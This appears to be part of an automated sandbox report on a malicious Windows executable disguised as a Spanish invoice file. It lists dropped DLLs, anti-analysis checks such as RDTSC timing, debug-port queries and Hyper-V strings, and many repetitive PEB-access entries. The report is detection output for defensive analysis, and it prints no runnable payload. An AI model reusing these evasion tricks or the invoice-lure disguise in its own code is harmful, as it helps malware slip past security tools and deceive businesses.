      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_324E09AD push ecx; mov dword ptr [esp], ecx 3_2_324E09B6
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File created: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File created: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\LangDLL.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API/Special instruction interceptor: Address: 4F46F34
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API/Special instruction interceptor: Address: 1B66F34
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe RDTSC instruction interceptor: First address: 4F06F11 second address: 4F06F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB4607F0888h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe RDTSC instruction interceptor: First address: 1B26F11 second address: 1B26F11 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB4608A1FC8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\LangDLL.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Evaded block: after key decision graph_0-4539
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API coverage: 0.2 %
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004065AA FindFirstFileW,FindClose, 0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_00402B75 FindFirstFileW, 0_2_00402B75
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425454918.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758773774.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425354162.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425454918.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758773774.000000000238C000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2425354162.000000000238C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWTQG
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe API call chain: ExitProcess graph end node graph_0-4430
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 3_2_3255D1C0 rdtsc 3_2_3255D1C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_00402048 LdrInitializeThunk,ShowWindow,EnableWindow, 0_2_00402048
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_6FA42351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FA42351
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F1070 mov eax, dword ptr fs:[00000030h]3_2_324F1070
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A903E mov eax, dword ptr fs:[00000030h]3_2_325A903E
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B50D9 mov eax, dword ptr fs:[00000030h]3_2_325B50D9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325090DB mov eax, dword ptr fs:[00000030h]3_2_325090DB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov ecx, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324F70C0 mov eax, dword ptr fs:[00000030h]3_2_324F70C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D0C0 mov eax, dword ptr fs:[00000030h]3_2_3255D0C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3255D0C0 mov eax, dword ptr fs:[00000030h]3_2_3255D0C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325050E4 mov eax, dword ptr fs:[00000030h]3_2_325050E4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325050E4 mov ecx, dword ptr fs:[00000030h]3_2_325050E4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DD08D mov eax, dword ptr fs:[00000030h]3_2_324DD08D
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D090 mov eax, dword ptr fs:[00000030h]3_2_3250D090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3250D090 mov eax, dword ptr fs:[00000030h]3_2_3250D090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251909C mov eax, dword ptr fs:[00000030h]3_2_3251909C
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D080 mov eax, dword ptr fs:[00000030h]3_2_3256D080
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3256D080 mov eax, dword ptr fs:[00000030h]3_2_3256D080
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E5096 mov eax, dword ptr fs:[00000030h]3_2_324E5096
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324D9148 mov eax, dword ptr fs:[00000030h]3_2_324D9148
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5152 mov eax, dword ptr fs:[00000030h]3_2_325B5152
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32573140 mov eax, dword ptr fs:[00000030h]3_2_32573140
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E7152 mov eax, dword ptr fs:[00000030h]3_2_324E7152
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32579179 mov eax, dword ptr fs:[00000030h]3_2_32579179
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF172 mov eax, dword ptr fs:[00000030h]3_2_324DF172
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DB136 mov eax, dword ptr fs:[00000030h]3_2_324DB136
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B7120 mov eax, dword ptr fs:[00000030h]3_2_325B7120
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1131 mov eax, dword ptr fs:[00000030h]3_2_324E1131
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E1131 mov eax, dword ptr fs:[00000030h]3_2_324E1131
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D1D0 mov eax, dword ptr fs:[00000030h]3_2_3251D1D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251D1D0 mov ecx, dword ptr fs:[00000030h]3_2_3251D1D0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B51CB mov eax, dword ptr fs:[00000030h]3_2_325B51CB
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325871F9 mov esi, dword ptr fs:[00000030h]3_2_325871F9
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E51ED mov eax, dword ptr fs:[00000030h]3_2_324E51ED
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B31E1 mov eax, dword ptr fs:[00000030h]3_2_325B31E1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325051EF mov eax, dword ptr fs:[00000030h]3_2_325051EF
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32537190 mov eax, dword ptr fs:[00000030h]3_2_32537190
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32595180 mov eax, dword ptr fs:[00000030h]3_2_32595180
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32595180 mov eax, dword ptr fs:[00000030h]3_2_32595180
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325911A4 mov eax, dword ptr fs:[00000030h]3_2_325911A4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324FB1B0 mov eax, dword ptr fs:[00000030h]3_2_324FB1B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519660 mov eax, dword ptr fs:[00000030h]3_2_32519660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32519660 mov eax, dword ptr fs:[00000030h]3_2_32519660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3257D660 mov eax, dword ptr fs:[00000030h]3_2_3257D660
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_3251F603 mov eax, dword ptr fs:[00000030h]3_2_3251F603
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_32511607 mov eax, dword ptr fs:[00000030h]3_2_32511607
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3616 mov eax, dword ptr fs:[00000030h]3_2_324E3616
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324E3616 mov eax, dword ptr fs:[00000030h]3_2_324E3616
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324DF626 mov eax, dword ptr fs:[00000030h]3_2_324DF626
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325B5636 mov eax, dword ptr fs:[00000030h]3_2_325B5636
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_324EB6C0 mov eax, dword ptr fs:[00000030h]3_2_324EB6C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exeCode function: 3_2_325A16CC mov eax, dword ptr fs:[00000030h]3_2_325A16CC
